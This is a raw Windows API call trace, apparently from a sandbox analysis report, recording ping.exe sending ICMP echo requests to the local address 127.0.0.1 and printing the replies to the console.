[0096.795] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0096.796] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0096.796] SetThreadUILanguage (LangId=0x0) returned 0x409 [0096.798] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0096.798] _fileno (_File=0x76ea4c28) returned 1 [0096.798] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.798] GetFileType (hFile=0x28) returned 0x2 [0096.798] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f550 | out: lpMode=0xf5f550) returned 0 [0096.798] GetLastError () returned 0x6 [0096.798] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f4b4, nSize=0x50 | out: lpBuffer="䤐Ă") returned 0x0 [0096.798] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0096.801] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xf5f56c | out: phkResult=0xf5f56c*=0x88) returned 0x0 [0096.801] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xf5f560, lpData=0xf5f568, lpcbData=0xf5f564*=0x4 | out: lpType=0xf5f560*=0x0, lpData=0xf5f568*=0x0, lpcbData=0xf5f564*=0x4) returned 0x2 [0096.801] RegCloseKey (hKey=0x88) returned 0x0 [0096.801] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0xf5f530*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xf5f56c | out: ppResult=0xf5f56c*=0x102c318*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1028a60*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0096.802] FreeAddrInfoW (pAddrInfo=0x102c318*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1028a60*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0096.802] IcmpCreateFile () returned 0x1026bf0 [0096.805] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x102c2f0 [0096.805] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x1035270 [0096.806] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xf5f668, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0096.807] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0xf5f560, nSize=0x0, Arguments=0xf5f55c | out: lpBuffer="竈ăTõ┗\x94䰨盪❋") returned 0x14 [0096.808] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.808] _fileno (_File=0x76ea4c28) returned 1 [0096.808] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.808] GetFileType (hFile=0x28) returned 0x2 [0096.808] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f524 | out: lpMode=0xf5f524) returned 0 [0096.808] GetLastError () returned 0x6 [0096.808] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f488, nSize=0x50 | out: lpBuffer="õ❋") returned 0x0 [0096.808] _fileno (_File=0x76ea4c28) returned 1 [0096.808] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0096.808] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.808] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x1037b00 [0096.808] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x1037b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0096.808] _fileno (_File=0x76ea4c28) returned 1 [0096.809] _write (in: _FileHandle=1, _Buf=0x1037b00*, _MaxCharCount=0x14 | out: _Buf=0x1037b00*) returned 20 [0096.809] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.809] _fileno (_File=0x76ea4c28) returned 1 [0096.809] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0096.809] LocalFree (hMem=0x1037b00) returned 0x0 [0096.809] LocalFree (hMem=0x1037ac8) returned 0x0 [0096.809] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xf5f560, nSize=0x0, Arguments=0xf5f55c | out: lpBuffer="竈ăTõ▪\x94䰨盪❚") returned 0x18 [0096.809] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.809] _fileno (_File=0x76ea4c28) returned 1 [0096.809] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.809] GetFileType (hFile=0x28) returned 0x2 [0096.809] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f524 | out: lpMode=0xf5f524) returned 0 [0096.809] GetLastError () returned 0x6 [0096.809] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f488, nSize=0x50 | out: lpBuffer="õ❚") returned 0x0 [0096.809] _fileno (_File=0x76ea4c28) returned 1 [0096.809] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0096.809] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0096.809] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x102c200 [0096.809] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x102c200, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0096.809] _fileno (_File=0x76ea4c28) returned 1 [0096.809] _write (in: _FileHandle=1, _Buf=0x102c200*, _MaxCharCount=0x18 | out: _Buf=0x102c200*) returned 24 [0096.809] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.809] _fileno (_File=0x76ea4c28) returned 1 [0096.809] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0096.809] LocalFree (hMem=0x102c200) returned 0x0 [0096.809] LocalFree (hMem=0x1037ac8) returned 0x0 [0096.809] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0096.809] IcmpSendEcho2Ex (in: IcmpHandle=0x1026bf0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x102c2f0, RequestSize=0x20, RequestOptions=0xf5f5dc, ReplyBuffer=0x1035270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1035270) returned 0x1 [0096.811] InetNtopW (in: Family=2, pAddr=0xf5f5cc, pStringBuf=0xf5f6f4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0096.811] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xf5f560, nSize=0x0, Arguments=0xf5f55c | out: lpBuffer="笈ăTõ⛔\x94䰨盪✣") returned 0x16 [0096.811] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.811] _fileno (_File=0x76ea4c28) returned 1 [0096.811] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.811] GetFileType (hFile=0x28) returned 0x2 [0096.811] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f524 | out: lpMode=0xf5f524) returned 0 [0096.811] GetLastError () returned 0x6 [0096.811] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f488, nSize=0x50 | out: lpBuffer="õ✣") returned 0x0 [0096.811] _fileno (_File=0x76ea4c28) returned 1 [0096.811] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0096.811] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0096.811] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x1037b40 [0096.811] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x1037b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0096.811] _fileno (_File=0x76ea4c28) returned 1 [0096.811] _write (in: _FileHandle=1, _Buf=0x1037b40*, _MaxCharCount=0x16 | out: _Buf=0x1037b40*) returned 22 [0096.811] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.811] _fileno (_File=0x76ea4c28) returned 1 [0096.811] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0096.811] LocalFree (hMem=0x1037b40) returned 0x0 [0096.811] LocalFree (hMem=0x1037b08) returned 0x0 [0096.811] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xf5f560, nSize=0x0, Arguments=0xf5f55c | out: lpBuffer="笈ăTõ⛿\x94䰨盪✼") returned 0x9 [0096.811] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.811] _fileno (_File=0x76ea4c28) returned 1 [0096.811] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.811] GetFileType (hFile=0x28) returned 0x2 [0096.812] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f524 | out: lpMode=0xf5f524) returned 0 [0096.812] GetLastError () returned 0x6 [0096.812] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f488, nSize=0x50 | out: lpBuffer="õ✼") returned 0x0 [0096.812] _fileno (_File=0x76ea4c28) returned 1 [0096.812] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0096.812] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.812] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10289d0 [0096.812] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x10289d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0096.812] _fileno (_File=0x76ea4c28) returned 1 [0096.812] _write (in: _FileHandle=1, _Buf=0x10289d0*, _MaxCharCount=0x9 | out: _Buf=0x10289d0*) returned 9 [0096.812] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.812] _fileno (_File=0x76ea4c28) returned 1 [0096.812] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0096.812] LocalFree (hMem=0x10289d0) returned 0x0 [0096.812] LocalFree (hMem=0x1037b08) returned 0x0 [0096.812] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xf5f564, nSize=0x0, Arguments=0xf5f560 | out: lpBuffer="笈ăTõ➷\x94䰨盪✧") returned 0x9 [0096.812] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.812] _fileno (_File=0x76ea4c28) returned 1 [0096.812] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.812] GetFileType (hFile=0x28) returned 0x2 [0096.812] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f528 | out: lpMode=0xf5f528) returned 0 [0096.812] GetLastError () returned 0x6 [0096.812] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f48c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0096.812] _fileno (_File=0x76ea4c28) returned 1 [0096.812] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0096.812] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.812] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1028a78 [0096.812] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x1028a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0096.812] _fileno (_File=0x76ea4c28) returned 1 [0096.812] _write (in: _FileHandle=1, _Buf=0x1028a78*, _MaxCharCount=0x9 | out: _Buf=0x1028a78*) returned 9 [0096.812] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.812] _fileno (_File=0x76ea4c28) returned 1 [0096.812] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0096.812] LocalFree (hMem=0x1028a78) returned 0x0 [0096.813] LocalFree (hMem=0x1037b08) returned 0x0 [0096.813] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xf5f560, nSize=0x0, Arguments=0xf5f55c | out: lpBuffer="笈ăTõ⟘\x94䰨盪✨") returned 0x9 [0096.813] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.813] _fileno (_File=0x76ea4c28) returned 1 [0096.813] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.813] GetFileType (hFile=0x28) returned 0x2 [0096.813] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f524 | out: lpMode=0xf5f524) returned 0 [0096.813] GetLastError () returned 0x6 [0096.813] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f488, nSize=0x50 | out: lpBuffer="õ✨") returned 0x0 [0096.813] _fileno (_File=0x76ea4c28) returned 1 [0096.813] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0096.813] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.813] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1028a90 [0096.813] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x1028a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0096.813] _fileno (_File=0x76ea4c28) returned 1 [0096.813] _write (in: _FileHandle=1, _Buf=0x1028a90*, _MaxCharCount=0x9 | out: _Buf=0x1028a90*) returned 9 [0096.813] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.813] _fileno (_File=0x76ea4c28) returned 1 [0096.813] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0096.813] LocalFree (hMem=0x1028a90) returned 0x0 [0096.813] LocalFree (hMem=0x1037b08) returned 0x0 [0096.813] Sleep (dwMilliseconds=0x3e8) [0097.818] IcmpSendEcho2Ex (in: IcmpHandle=0x1026bf0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x102c2f0, RequestSize=0x20, RequestOptions=0xf5f5dc, ReplyBuffer=0x1035270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1035270) returned 0x1 [0097.818] InetNtopW (in: Family=2, pAddr=0xf5f5cc, pStringBuf=0xf5f6f4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0097.818] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xf5f560, nSize=0x0, Arguments=0xf5f55c | out: lpBuffer="羠ăTõ⛔\x94䰨盪✣") returned 0x16 [0097.818] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0097.818] _fileno (_File=0x76ea4c28) returned 1 [0097.819] _get_osfhandle (_FileHandle=1) returned 0x28 [0097.819] GetFileType (hFile=0x28) returned 0x2 [0097.819] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f524 | out: lpMode=0xf5f524) returned 0 [0097.819] GetLastError () returned 0x6 [0097.819] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f488, nSize=0x50 | out: lpBuffer="õ✣") returned 0x0 [0097.819] _fileno (_File=0x76ea4c28) returned 1 [0097.819] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0097.819] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0097.819] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x1037fd8 [0097.819] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x1037fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0097.819] _fileno (_File=0x76ea4c28) returned 1 [0097.819] _write (in: _FileHandle=1, _Buf=0x1037fd8*, _MaxCharCount=0x16 | out: _Buf=0x1037fd8*) returned 22 [0097.819] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0097.819] _fileno (_File=0x76ea4c28) returned 1 [0097.819] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0097.819] LocalFree (hMem=0x1037fd8) returned 0x0 [0097.819] LocalFree (hMem=0x1037fa0) returned 0x0 [0097.819] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xf5f560, nSize=0x0, Arguments=0xf5f55c | out: lpBuffer="羠ăTõ⛿\x94䰨盪✼") returned 0x9 [0097.819] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0097.819] _fileno (_File=0x76ea4c28) returned 1 [0097.819] _get_osfhandle (_FileHandle=1) returned 0x28 [0097.819] GetFileType (hFile=0x28) returned 0x2 [0097.819] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f524 | out: lpMode=0xf5f524) returned 0 [0097.819] GetLastError () returned 0x6 [0097.819] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f488, nSize=0x50 | out: lpBuffer="õ✼") returned 0x0 [0097.819] _fileno (_File=0x76ea4c28) returned 1 [0097.819] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0097.819] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.819] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1028970 [0097.819] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x1028970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0097.819] _fileno (_File=0x76ea4c28) returned 1 [0097.819] _write (in: _FileHandle=1, _Buf=0x1028970*, _MaxCharCount=0x9 | out: _Buf=0x1028970*) returned 9 [0097.819] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0097.819] _fileno (_File=0x76ea4c28) returned 1 [0097.820] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0097.820] LocalFree (hMem=0x1028970) returned 0x0 [0097.820] LocalFree (hMem=0x1037fa0) returned 0x0 [0097.820] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xf5f564, nSize=0x0, Arguments=0xf5f560 | out: lpBuffer="羠ăTõ➷\x94䰨盪✧") returned 0x9 [0097.820] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0097.820] _fileno (_File=0x76ea4c28) returned 1 [0097.820] _get_osfhandle (_FileHandle=1) returned 0x28 [0097.820] GetFileType (hFile=0x28) returned 0x2 [0097.820] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f528 | out: lpMode=0xf5f528) returned 0 [0097.820] GetLastError () returned 0x6 [0097.820] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f48c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0097.820] _fileno (_File=0x76ea4c28) returned 1 [0097.820] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0097.820] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.820] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1028970 [0097.820] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x1028970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0097.820] _fileno (_File=0x76ea4c28) returned 1 [0097.820] _write (in: _FileHandle=1, _Buf=0x1028970*, _MaxCharCount=0x9 | out: _Buf=0x1028970*) returned 9 [0097.820] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0097.820] _fileno (_File=0x76ea4c28) returned 1 [0097.820] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0097.820] LocalFree (hMem=0x1028970) returned 0x0 [0097.820] LocalFree (hMem=0x1037fa0) returned 0x0 [0097.820] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xf5f560, nSize=0x0, Arguments=0xf5f55c | out: lpBuffer="羠ăTõ⟘\x94䰨盪✨") returned 0x9 [0097.820] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0097.820] _fileno (_File=0x76ea4c28) returned 1 [0097.820] _get_osfhandle (_FileHandle=1) returned 0x28 [0097.820] GetFileType (hFile=0x28) returned 0x2 [0097.820] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f524 | out: lpMode=0xf5f524) returned 0 [0097.820] GetLastError () returned 0x6 [0097.820] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f488, nSize=0x50 | out: lpBuffer="õ✨") returned 0x0 [0097.820] _fileno (_File=0x76ea4c28) returned 1 [0097.820] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0097.820] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.820] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1028a78 [0097.820] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x1028a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0097.820] _fileno (_File=0x76ea4c28) returned 1 [0097.820] _write (in: _FileHandle=1, _Buf=0x1028a78*, _MaxCharCount=0x9 | out: _Buf=0x1028a78*) returned 9 [0097.820] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0097.820] _fileno (_File=0x76ea4c28) returned 1 [0097.820] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0097.820] LocalFree (hMem=0x1028a78) returned 0x0 [0097.820] LocalFree (hMem=0x1037fa0) returned 0x0 [0097.820] Sleep (dwMilliseconds=0x3e8) [0098.833] IcmpSendEcho2Ex (in: IcmpHandle=0x1026bf0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x102c2f0, RequestSize=0x20, RequestOptions=0xf5f5dc, ReplyBuffer=0x1035270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1035270) returned 0x1 [0098.834] InetNtopW (in: Family=2, pAddr=0xf5f5cc, pStringBuf=0xf5f6f4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0098.834] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xf5f560, nSize=0x0, Arguments=0xf5f55c | out: lpBuffer="羠ăTõ⛔\x94䰨盪✣") returned 0x16 [0098.834] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0098.834] _fileno (_File=0x76ea4c28) returned 1 [0098.834] _get_osfhandle (_FileHandle=1) returned 0x28 [0098.834] GetFileType (hFile=0x28) returned 0x2 [0098.834] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f524 | out: lpMode=0xf5f524) returned 0 [0098.835] GetLastError () returned 0x6 [0098.835] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f488, nSize=0x50 | out: lpBuffer="õ✣") returned 0x0 [0098.835] _fileno (_File=0x76ea4c28) returned 1 [0098.835] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0098.835] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0098.835] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x1037fd8 [0098.835] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x1037fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0098.835] _fileno (_File=0x76ea4c28) returned 1 [0098.835] _write (in: _FileHandle=1, _Buf=0x1037fd8*, _MaxCharCount=0x16 | out: _Buf=0x1037fd8*) returned 22 [0098.835] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0098.835] _fileno (_File=0x76ea4c28) returned 1 [0098.835] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0098.835] LocalFree (hMem=0x1037fd8) returned 0x0 [0098.835] LocalFree (hMem=0x1037fa0) returned 0x0 [0098.835] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xf5f560, nSize=0x0, Arguments=0xf5f55c | out: lpBuffer="羠ăTõ⛿\x94䰨盪✼") returned 0x9 [0098.835] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0098.835] _fileno (_File=0x76ea4c28) returned 1 [0098.835] 